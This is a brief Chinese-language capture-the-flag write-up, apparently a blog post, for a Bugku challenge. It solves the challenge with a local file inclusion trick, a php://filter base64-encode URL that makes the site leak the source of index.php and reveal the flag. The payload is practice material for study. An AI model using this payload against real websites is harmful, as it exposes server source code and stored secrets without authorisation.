WP-Bugku-flag在index里

题目地址: http://120.24.86.145:8005/post/

进入题目后看到只有一个可点击的文字
点击之后跳转到http://120.24.86.145:8005/post/index.php?file=show.php

想到题目是:flag在index里
那么可能是文件包含
构造url:
http://120.24.86.145:8005/post/index.php?file=php://filter/read=convert.base64-encode/resource=index.php
得到了一串base64加密的字符串
base64解密得到包含flag的代码
得到flag{edulcni_elif_lacol_si_siht}


AbelChe wechat
扫码加微信
Donate here!!!
0%